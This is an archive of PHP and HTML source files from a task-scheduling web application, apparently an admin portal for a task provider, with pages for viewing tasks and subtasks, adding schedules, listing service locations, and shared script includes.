'"'; if ($i < count($subtasks) - 1) { $subtaskDates .= ','; } } ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-box bg-blue"></i> <div class="d-inline"> <h5>View Task</h5> <span>View details of a task</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Task</li> </ol> </nav> </div> </div> </div> <!-- New row for buttons and actions --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> </div> </div> </div> </div> </div> <!-- Modal to assign task to a company --> <div class="modal fade" id="AssignTaskModal" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-lg mt-0 mb-0" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Assign Task to Company</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button> </div> <div class="modal-body"> <form id="tasksForm"> <div class="row"> <div class="col-md-6"> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="schedule-id" name="schedule-id" class="form-control" value="<?php echo $taskId; ?>" readonly> </div> </div> <div class="form-group row"> <label for="companyId" class="col-sm-3 col-form-label">Company:</label> <div class="col-sm-9"> <select id="companyId" name="companyId" class="form-control select2"> <!-- PHP code to fetch and display companies --> <?php // Fetch company list from the database $companies = $taskService->getAllCompanies(); if ($companies) { foreach ($companies as $company) { echo '<option value="' . $company->id . '">' . $company->first_name . " " . $company->last_name . '</option>'; } } else { echo '<option value="">No companies available</option>'; } ?> </select> </div> </div> </div> </div> </form> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" form="tasksForm" id="assignTask" class="btn btn-primary">Assign Task </button> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="AddSubtaskModal" tabindex="-1" role="dialog" aria-labelledby="AddSubtaskModalLabel" aria-hidden="true"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="AddSubtaskModalLabel">Add Subtask</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <form id="addSubtaskForm"> <div class="modal-body"> <input type="hidden" name="task_id" value="<?php echo $taskId; ?>"> <input type="hidden" class="form-control" id="service_name" name="service_name" value="<?php echo $task->service_id; ?>"> <div class="form-group"> <label for="subtask_date">Subtask Date</label> <input type="date" class="form-control" id="subtask_date" name="subtask_date" required> </div> <div class="form-group"> <label for="subtask_time">Subtask Time</label> <input type="time" class="form-control" id="subtask_time" name="subtask_time" required> <!-- <label for="subtask_time">Subtask Time</label>--> <!-- <input type="time" class="form-control" id="subtask_time" name="subtask_time">--> </div> <!-- Add more fields as needed --> <script> //Disable all dates before today var today = new Date(); var dd = today.getDate(); var mm = today.getMonth() + 1; //January is 0! var yyyy = today.getFullYear(); if (dd < 10) { dd = '0' + dd } if (mm < 10) { mm = '0' + mm } today = yyyy + '-' + mm + '-' + dd; document.getElementById("subtask_date").setAttribute("min", today); </script> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" class="btn btn-primary">Save changes</button> </div> </form> <script> var addSubtaskForm = document.getElementById('addSubtaskForm'); if (addSubtaskForm) { addSubtaskForm.addEventListener('submit', function (e) { e.preventDefault(); var formData = new FormData(addSubtaskForm); var xhr = new XMLHttpRequest(); xhr.open('POST', 'add_subtask.php', true); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'Subtask added successfully!') { Swal.fire({ title: 'Subtask added successfully.', icon: 'success', confirmButtonText: 'Ok' }); // Optionally reload the page after a short delay setTimeout(() => { window.location.reload(); }, 2000); } else if (xhr.responseText === 'error') { Swal.fire({ title: 'An error occurred', text: 'Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_data') { Swal.fire({ title: 'Invalid data', text: 'Please check the data and try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_request') { Swal.fire({ title: 'Invalid request', text: 'Please check the request and try again.', icon: 'error', confirmButtonText: 'Ok' }); } } }; xhr.send(formData); }); } else { console.error('Add subtask form not found.'); } </script> </div> </div> </div> <div class="row"> <div class="col-xl-6 col-md-6"> <div class="card "> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-6"> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $task->service_name; ?> </h3> </td> </tr> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->region; ?> </h5></td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->schedule_name; ?> </h5> </td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->frequency; ?> </h5> </td> </tr> <!-- is public or not--> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> <div class="col-md-6"> <?php // Assuming $task->dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert the array to a comma-separated string ?> <div id="datepicker"></div> <script> flatpickr("#datepicker", { enable: [<?php echo $jsDates; ?>], // Array of selectable dates dateFormat: "Y-m-d", // Date format inline: true, // Show calendar inline defaultDate: today, // Highlighted date disableMobile: "false" }); </script> </div> </div> </div> </div> </div> <!-- Form to assign task to a company --> <div class="col-md-6"> <div class="card"> <div class="card-header"> <h3>Subtasks</h3> <div class="card-header-right"> <?php if($task->is_assigned == 0 ){ echo '<button type="button" class="btn btn-success" data-toggle="modal" data-target="#AddSubtaskModal">Add Subtask </button>'; } ?> </div> </div> <div class="card-body"> <!-- PHP code to fetch and display subtasks --> <?php // Fetch and display subtasks associated with the task // Display subtasks if ($subtasks) { ?> <table class="table" id="advanced_table"> <thead> <tr> <th>Id</th> <th>Date</th> <th>Time</th> <th>Completed</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($subtasks as $subtask) { ?> <tr> <td> ST-000<?php echo $subtask->id; ?></td> <td><?php echo $subtask->subtask_date; ?></td> <td><?php echo $subtask->subtask_time? $date = date("g:i A", strtotime($subtask->subtask_time)) : ''; ?></td> <td> <?php if ($subtask->ignored) { echo '<span class="badge badge-warning">Ignored</span>'; } else { echo $subtask->completed ? '<span class="badge badge-success">Completed</span>' : '<span class="badge badge-danger">Not Completed</span>'; } ?> </td> <td> <a href="viewsubtask.php?id=<?php echo $System->encryptData($subtask->id); ?>" class="btn btn-primary">View</a> <!-- if subtask is not assigned to any company then delete button will be shown --> <?php if ($subtask->assigned == 0 && $task->is_assigned == 0) { echo '<button type="button" class="btn btn-danger delete-subtask" data-subtask-id="'.$subtask->id.'">Delete</button>'; } ?> </td> </tr> <?php } ?> </tbody> </table> <?php } else { echo '<p>No subtasks found for this task.</p>'; } ?> </div> </div> </div> </div> </div> </div> <script> var assignTaskButton = document.getElementById('assignTask'); if (assignTaskButton) { assignTaskButton.addEventListener('click', function () { console.log('Assign task button found.'); var companyId = document.getElementById('companyId').value; if (companyId) { Swal.fire({ title: 'Are you sure?', text: "Do you want to assign this task to the selected company?", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, assign it!', cancelButtonText: 'No, cancel' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'assigntask.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'success') { Swal.fire({ title: 'Task assigned successfully.', icon: 'success', confirmButtonText: 'Ok' }); // Optionally reload the page after a short delay setTimeout(() => { window.location.reload(); }, 2000); } else if (xhr.responseText === 'error') { Swal.fire({ title: 'An error occurred', text: 'Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'task_not_found') { Swal.fire({ title: 'Task not found', text: 'Please check the task ID.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_data') { Swal.fire({ title: 'Invalid data', text: 'Please check the data and try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_request') { Swal.fire({ title: 'Invalid request', text: 'Please check the request and try again.', icon: 'error', confirmButtonText: 'Ok' }); } } }; var taskId = '<?php echo htmlspecialchars($taskId); ?>'; xhr.send('taskId=' + taskId + '&companyId=' + companyId); } }); } }); } else { console.error('Assign task button not found.'); } // make public button var makePublicButton = document.getElementById('makePublic'); if (makePublicButton) { makePublicButton.addEventListener('click', function () { console.log('Make public button found.'); Swal.fire({ title: 'Are you sure?', text: "Do you want to make this task public?", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, make it public!', cancelButtonText: 'No, cancel' }).then((result) => { if (result.isConfirmed) { var xhr = new XMLHttpRequest(); xhr.open('POST', 'makepublic.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function () { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response if (xhr.responseText === 'success') { Swal.fire({ title: 'Task made public successfully.', icon: 'success', confirmButtonText: 'Ok' }); // Optionally reload the page after a short delay setTimeout(() => { window.location.reload(); }, 2000); } else if (xhr.responseText === 'error') { Swal.fire({ title: 'An error occurred', text: 'Please try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'task_not_found') { Swal.fire({ title: 'Task not found', text: 'Please check the task ID.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_data') { Swal.fire({ title: 'Invalid data', text: 'Please check the data and try again.', icon: 'error', confirmButtonText: 'Ok' }); } else if (xhr.responseText === 'invalid_request') { Swal.fire({ title: 'Invalid request', text: 'Please check the request and try again.', icon: 'error', confirmButtonText: 'Ok' }); } } }; var taskId = '<?php echo htmlspecialchars($taskId); ?>'; xhr.send('taskId=' + taskId); } }); }); } else { console.error('Make public button not found.'); } document.addEventListener('DOMContentLoaded', function() { // Find all delete buttons and attach click event var deleteButtons = document.querySelectorAll('.delete-subtask'); deleteButtons.forEach(function(button) { button.addEventListener('click', function() { var subtaskId = button.getAttribute('data-subtask-id'); // Show confirmation dialog using SweetAlert Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { // If confirmed, make AJAX request to delete_subtask.php var xhr = new XMLHttpRequest(); xhr.open('POST', 'delete_subtask.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { console.log(xhr.responseText); // Log the response for debugging if (xhr.responseText === 'success') { Swal.fire({ title: 'Deleted!', text: 'Your subtask has been deleted.', icon: 'success' }).then(() => { window.location.reload(); // Reload the page after deletion }); } else { Swal.fire({ title: 'Error!', text: 'Failed to delete subtask.', icon: 'error' }); } } }; xhr.send('subtaskId=' + subtaskId); // Send subtask ID to delete_subtask.php } }); }); }); }); </script> <?php include('footer.php'); ?> taskprovider/scripts.php000064400000006267151676701240011505 0ustar00 <script src="../../node_modules/popper.js/dist/umd/popper.min.js"></script> <script src="../../node_modules/bootstrap/dist/js/bootstrap.min.js"></script> <script src="../../node_modules/perfect-scrollbar/dist/perfect-scrollbar.min.js"></script> <script src="../../node_modules/screenfull/dist/screenfull.js"></script> <script src="../../node_modules/flatpickr/dist/flatpickr.js"></script> <script src="../../node_modules/sweetalert2/dist/sweetalert2.all.min.js"></script> <script src="../../dist/js/theme.min.js"></script> <script src="../../node_modules/popper.js/dist/umd/popper.min.js"></script> <script src="../../node_modules/datatables.net/js/jquery.dataTables.min.js"></script> <script src="../../node_modules/datatables.net-bs4/js/dataTables.bootstrap4.min.js"></script> <script src="../../node_modules/datatables.net-responsive/js/dataTables.responsive.min.js"></script> <script src="../../node_modules/datatables.net-responsive-bs4/js/responsive.bootstrap4.min.js"></script> <script src="../../node_modules/d3/dist/d3.min.js"></script> <script src="../../node_modules/c3/c3.min.js"></script> <script src="../../js/tables.js"></script> <!--<script src="../../js/widgets.js"></script>--> <script src="../../js/charts.js"></script> <script type="text/javascript" charset="utf8" src="https://code.jquery.com/jquery-3.5.1.js"></script> <script type="text/javascript" charset="utf8" src="https://cdn.datatables.net/1.10.24/js/jquery.dataTables.js"></script> <script src="../../node_modules/flatpickr/dist/flatpickr.min.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <script src="../../node_modules/bootstrap-tagsinput/dist/bootstrap-tagsinput.min.js"></script> <script src="../../node_modules/jquery.repeater/jquery.repeater.min.js"></script> <!--<script src="../../node_modules/mohithg-switchery/dist/switchery.min.js"></script>--> <!--<script src="../../js/form-advanced.js"></script>--> <!-- Google Analytics: change UA-XXXXX-X to be your site's ID. --> <script> (function(b,o,i,l,e,r){b.GoogleAnalyticsObject=l;b[l]||(b[l]= function(){(b[l].q=b[l].q||[]).push(arguments)});b[l].l=+new Date; e=o.createElement(i);r=o.getElementsByTagName(i)[0]; e.src='https://www.google-analytics.com/analytics.js'; r.parentNode.insertBefore(e,r)}(window,document,'script','ga')); ga('create','UA-XXXXX-X','auto');ga('send','pageview'); </script> <script> var scriptUrls = {}; var scripts = document.getElementsByTagName('script'); for (var i = 0; i < scripts.length; i++) { var src = scripts[i].src; if (src && !scriptUrls[src]) { scriptUrls[src] = true; } else { scripts[i].parentNode.removeChild(scripts[i]); } } </script> <script> $(document).ready(function() { $('.select2').select2(); }); </script> <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-datepicker/1.9.0/js/bootstrap-datepicker.min.js"></script> <script src="../../node_modules/select2/dist/js/select2.min.js"></script> <script src="https://cdn.datatables.net/1.10.24/js/jquery.dataTables.min.js"></script> </body> </html> taskprovider/addtasks.php000064400000033325151676701240011607 0ustar00<?php include('head.php'); ?> <?php require_once '../../Service/ServiceService.php'; // Create ServiceService instance $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-edit bg-blue"></i> <div class="d-inline"> <h5>Add Tasks</h5> <span>Add tasks to the schedule</span> </div> </div> </div> <div class="col-lg-4"></div> </div> </div> <div class="card"> <div class="card-header"> <div class="card-header-left"> <h3>Add Tasks</h3> </div> <div class="card-header-right"> </div> </div> <div class="card-body"> <p>Click the add button to repeat the form</p> <div class="form-group"> <label for="schedule-name" class="sr-only">Schedule Name</label> <input type="text" class="form-control" id="schedule-name" placeholder="Schedule Name"> <input type="hidden" id="current-user" value="<?php echo $_SESSION['user_id']; ?>"> </div> <form class="form-inline repeater"> <div data-repeater-list="group-a"> <div data-repeater-item="" class="d-flex mb-2"> <table class="left-column"> <tr> <td> <div class="form-group mb-2"> <label for="service-name" class="service-name-label">Service Name</label> <select name="service-name" class="form-control select2 service-name-select"> </select> </div> </td> </tr> <tr> <td> <div class="form-group mb-2"> <label for="frequency" class="frequency-label">Frequency</label> <select class="form-control frequencySelect" name="frequency"> <option value="daily">Daily</option> <option value="3x/week">3x/week</option> </select> </div> </td> </tr> </table> <div class="form-group mb-2 mr-sm-2 mb-sm-0"> <input type="text" class="form-control date-picker" placeholder="Select Date" hidden> </div> <div class="date-time-container mb-2 mr-sm-2 mb-sm-0 flex-grow-1"> <!-- Date and time fields will be appended here --> </div> <button data-repeater-delete type="button" class="btn btn-danger btn-icon ml-2"> <i class="ik ik-trash-2"></i> </button> </div> </div> <button data-repeater-create type="button" class="btn btn-success btn-icon ml-2 mb-2"> <i class="ik ik-plus"></i> </button> </form> <button id="addTaskBtn" class="btn btn-primary">Add Tasks</button> </div> </div> </div> </div> <style> .card-body { width: 100%; } .repeater { } .repeater > div { background-color: #f9f9f9; } label { font-weight: bold; } .form-control { width: 100%; } </style> <script> $(document).ready(function () { function initializeFlatpickr() { $('.date-picker').each(function () { flatpickr(this, { dateFormat: "Y-m-d", mode: "multiple", inline: true, onChange: function (selectedDates, dateStr, instance) { const container = $(instance.element).closest('.d-flex').find('.date-time-container'); const existingDateTimePairs = []; container.find('.form-group').each(function () { const date = $(this).find('input[type="text"]').first().val(); const time = $(this).find('.time-picker').val(); existingDateTimePairs.push({date, time}); }); selectedDates.sort((a, b) => new Date(a) - new Date(b)); container.empty(); selectedDates.forEach((date) => { const formattedDate = formatDate(date); let timeValue = ''; existingDateTimePairs.forEach(pair => { if (pair.date === formattedDate) { timeValue = pair.time; } }); container.append(` <div class="form-group mb-2 mr-sm-2 mb-sm-0"> <input type="text" class="form-control" value="${formattedDate}" readonly> <input type="text" class="form-control time-picker" placeholder="Start Time" value="${timeValue}"> </div> `); }); initializeTimePicker(container); } }); }); } function initializeTimePicker(container) { container.find('.time-picker').each(function () { flatpickr(this, { enableTime: true, noCalendar: true, dateFormat: "H:i", }); }); } function formatDate(date) { const year = date.getFullYear(); const month = (date.getMonth() + 1).toString().padStart(2, '0'); const day = date.getDate().toString().padStart(2, '0'); return `${year}-${month}-${day}`; } $('.repeater').repeater({ show: function () { $(this).slideDown(); initializeFlatpickr(); populateServiceNames($(this).find('.service-name-select')); initializeSelect2($(this).find('.service-name-select')); // Initialize Select2 for new element }, hide: function (deleteElement) { const container = $(deleteElement).closest('.d-flex').find('.date-time-container'); container.find('.form-group').remove(); $(deleteElement).remove(); }, ready: function (setIndexes) { initializeFlatpickr(); populateServiceNames($('.service-name-select')); initializeSelect2($('.service-name-select')); // Initialize Select2 for existing elements } }); initializeFlatpickr(); function populateServiceNames(selectElement) { var services = <?php echo json_encode($services); ?>; services.forEach(service => { var option = document.createElement("option"); option.value = service.id; option.textContent = service.name; selectElement.append(option); }); } function initializeSelect2(selectElement) { selectElement.select2({ placeholder: 'Select a service', allowClear: true }); } $('#addTaskBtn').click(function (event) { event.preventDefault(); var scheduleName = $('#schedule-name').val().trim(); var currentUserId = $('#current-user').val().trim(); var tasks = []; $('div[data-repeater-item]').each(function () { var dates = []; var service = $(this).find('.service-name-select').val().trim(); var frequency = $(this).find('.frequencySelect').val().trim(); $(this).find('.date-time-container .form-group').each(function () { var date = $(this).find('input[type="text"]').first().val().trim(); //if a daily task send time otherwise time is empty var time = frequency === 'daily' ? $(this).find('.time-picker').val().trim() : ''; dates.push({date: date, time: time}); }); tasks.push({ service: service, frequency: frequency, dates: dates }); }); var postData = { scheduleName: scheduleName, currentUserId: currentUserId, tasks: tasks }; if (scheduleName === '') { Swal.fire({ title: 'Error', text: 'Please enter a schedule name', icon: 'error', confirmButtonText: 'Close' }); return; } if (tasks.length === 0) { Swal.fire({ title: 'Error', text: 'Please add at least one task', icon: 'error', confirmButtonText: 'Close' }); return; } if (tasks.some(task => task.dates.length === 0)) { Swal.fire({ title: 'Error', text: 'Please select at least one date and time for each task', icon: 'error', confirmButtonText: 'Close' }); return; } Swal.fire({ title: 'Form Data', text: 'Are you sure you want to submit the form data?', confirmButtonText: 'Confirm', cancelButtonText: 'Cancel', showCancelButton: true, showLoaderOnConfirm: true, preConfirm: () => { return new Promise(function (resolve, reject) { $.ajax({ type: 'POST', url: 'add_tasks.php', data: JSON.stringify(postData), contentType: 'application/json', success: function (response) { resolve(response); }, error: function (xhr, status, error) { reject(error); } }); }); }, allowOutsideClick: () => !Swal.isLoading() }).then((result) => { if (result.isConfirmed) { var response = JSON.parse(result.value); if (response.success) { Swal.fire({ title: 'Success', text: response.message, icon: 'success', confirmButtonText: 'Close' }).then(() => { window.location.href = 'viewscheduletasks.php?id=' + btoa(response.schedule_id); }); } else { Swal.fire({ title: 'Error', text: response.message, icon: 'error', confirmButtonText: 'Close' }); } } else if (result.dismiss === Swal.DismissReason.cancel) { Swal.fire({ title: 'Cancelled', text: 'You cancelled the operation', icon: 'info', confirmButtonText: 'Close' }); } }).catch((error) => { console.error('Error:', error); Swal.fire({ title: 'Error', text: 'An error occurred while processing your request. Please try again later.', icon: 'error', confirmButtonText: 'Close' }); }); }); // Initialize service names in the first select and apply Select2 initializeSelect2($('.service-name-select').first()); }); </script> <?php include('footer.php'); ?> taskprovider/sidebar.php000064400000006225151676701240011421 0ustar00<div class="app-sidebar colored"> <div class="sidebar-header"> <a class="header-brand" href="#"> <div class="logo-img"> <!-- <img src="../../src/img/Emera-Primary-Logo.png" class="header-brand-img" alt="Emera Primary Logo" height="50px">--> </div> <img src="../../src/img/Emera-Primary-Logo-White.png" class="header-brand-img" alt="Emera Primary Logo" height="50px"> </a> <button type="button" class="nav-toggle"><i data-toggle="expanded" class="ik ik-toggle-right toggle-icon"></i></button> <button id="sidebarClose" class="nav-close"><i class="ik ik-x"></i></button> </div> <div class="sidebar-content"> <div class="nav-container"> <nav id="main-menu-navigation" class="navigation-main"> <div class="nav-item"> <a href="dashboard.php"><i class="ik ik-bar-chart-2"></i><span>Dashboard</span></a> </div> <div class="nav-lavel">Tasks</div> <div class="nav-item"> <a href="addtasks.php"><i class="ik ik-box"></i><span>Add Schedules</span></a> <a href="uploadSchedule.php"><i class="ik ik-upload"></i><span>Upload Schedules</span></a> </div> <div class="nav-lavel">Schedules</div> <div class="nav-item"> <a href="viewschedules.php"><i class="ik ik-calendar"></i><span>View Schedules</span></a> </div> <div class="nav-lavel">Services</div> <div class="nav-item"> <a href="viewservices.php"><i class="ik ik-map-pin"></i><span>Service Locations</span></a> </div> <div class="nav-lavel">Reports</div> <div class="nav-item"> <a href="reports.php"><i class="ik ik-pie-chart"></i><span>Reports</span></a> </div> <div class="nav-lavel">Logout</div> <div class="nav-item"> <a href="../logout.php" id="logout-link"><i class="ik ik-power"></i><span>Logout</span></a> </div> <script> document.getElementById('logout-link').addEventListener('click', function(event) { event.preventDefault(); // Prevent the default action Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert this!", icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, log out!' }).then((result) => { if (result.isConfirmed) { window.location.href ='../logout.php'; } }); }); </script> </nav> </div> </div> </div>taskprovider/viewservices.php000064400000024772151676701240012535 0ustar00<?php include('head.php'); require_once '../../Service/ServiceService.php'; require_once '../../Classes/System.php'; $System = new System(); $serviceService = new ServiceService(); $services = $serviceService->getAllServices(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Services</h5> <span>View all services</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Services</a> </li> <li class="breadcrumb-item active" aria-current="page">View Services</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#exampleModalCenter"> <i class="ik ik-plus"></i> Create Service </button> </div> </div> </div> </div> <div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterLabel">Add a new service</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="serviceForm" class="forms-sample"> <div class="form-group row"> <label for="name" class="col-sm-3 col-form-label">Name:</label> <div class="col-sm-9"> <input type="text" id="name" name="name" class="form-control" required placeholder="Enter service name"> </div> </div> <div class="form-group row"> <label for="region" class="col-sm-3 col-form-label">Region:</label> <div class="col-sm-9"> <input type="text" id="region" name="region" class="form-control" required placeholder="Enter region"> </div> </div> <div class="form-group row"> <label for="address_line1" class="col-sm-3 col-form-label">Address Line 1:</label> <div class="col-sm-9"> <input type="text" id="address_line1" name="address_line1" class="form-control" placeholder="Enter address line 1"> </div> </div> <div class="form-group row"> <label for="address_line2" class="col-sm-3 col-form-label">Address Line 2:</label> <div class="col-sm-9"> <input type="text" id="address_line2" name="address_line2" class="form-control" placeholder="Enter address line 2"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="suburb" name="suburb" class="form-control" placeholder="Enter suburb"> </div> </div> <div class="form-group row"> <label for="city" class="col-sm-3 col-form-label">City:</label> <div class="col-sm-9"> <input type="text" id="city" name="city" class="form-control" placeholder="Enter city"> </div> </div> <div class="form-group row"> <label for="state" class="col-sm-3 col-form-label">State:</label> <div class="col-sm-9"> <input type="text" id="state" name="state" class="form-control" placeholder="Enter state"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="postal_code" name="postal_code" class="form-control" placeholder="Enter postal code"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="country" name="country" class="form-control" placeholder="Enter country"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="latitude" name="latitude" class="form-control" placeholder="Enter latitude"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="longitude" name="longitude" class="form-control" placeholder="Enter longitude"> </div> </div> </form> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" form="serviceForm" class="btn btn-primary">Add Service</button> </div> </div> </div> </div> <script> document.getElementById('serviceForm').addEventListener('submit', function(event) { event.preventDefault(); const formData = new FormData(this); fetch('submit_service.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { const messageDiv = document.getElementById('message'); messageDiv.textContent = data; messageDiv.classList.add('alert', 'alert-success'); Swal.fire({ title: 'Success!', text: data, icon: 'success', confirmButtonText: 'Ok' }).then(() => { location.reload(); }); document.getElementById('serviceForm').reset(); }) .catch(error => { const messageDiv = document.getElementById('message'); messageDiv.textContent = 'Error: ' + error; messageDiv.classList.add('alert', 'alert-danger'); Swal.fire({ title: 'Error!', text: error, icon: 'error', confirmButtonText: 'Ok' }); }); }); </script> <!-- continued from previous code snippet --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>Name</th> <th>Region</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($services as $service): ?> <tr> <td><?php echo $service->name; ?></td> <td><?php echo $service->region; ?></td> <td> <a href="viewservice.php?id=<?php echo $System->encryptData($service->id); ?>" class="btn btn-success"> <i class="ik ik-eye text-white"></i> View </a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> taskprovider/submit_schedule.php000064400000001346151676701240013166 0ustar00<?php require_once '../../Classes/Schedules.php'; require_once '../../Service/ScheduleService.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $schedule_name = $_POST['schedule-name']; $currentUser = $_POST['created_by']; $completed = false; // Default value $created_at = date('Y-m-d H:i:s'); $updated_at = date('Y-m-d H:i:s'); $schedule = new Schedules(null, $schedule_name, $currentUser, $completed, $created_at, $updated_at); $scheduleService = new ScheduleService(); if ($scheduleService->addSchedule($schedule)) { echo "Schedule added successfully!"; } else { echo "Failed to add schedule."; } } else { echo "Invalid request method."; } ?> taskprovider/header.php000064400000016314151676701240011240 0ustar00<header class="header-top" header-theme="dark"> <div class="container-fluid"> <div class="d-flex justify-content-between"> <div class="top-menu d-flex align-items-center"> <button type="button" class="btn-icon mobile-nav-toggle d-lg-none"><span></span></button> <div class="header-search"> </div> <button type="button" id="navbar-fullscreen" class="nav-link"><i class="ik ik-maximize"></i></button> </div> <div class="top-menu d-flex align-items-center"> <!-- <div class="dropdown">--> <!--<!-- <a class="nav-link dropdown-toggle" href="#" id="notiDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="ik ik-bell"></i><span class="badge bg-danger">3</span></a>-->--> <!-- <div class="dropdown-menu dropdown-menu-right notification-dropdown" aria-labelledby="notiDropdown">--> <!-- <h4 class="header">Notifications</h4>--> <!-- <div class="notifications-wrap">--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <i class="ik ik-check"></i>--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">Invitation accepted</span>--> <!-- <span class="media-content">Your have been Invited ...</span>--> <!-- </span>--> <!-- </a>--> <!-- 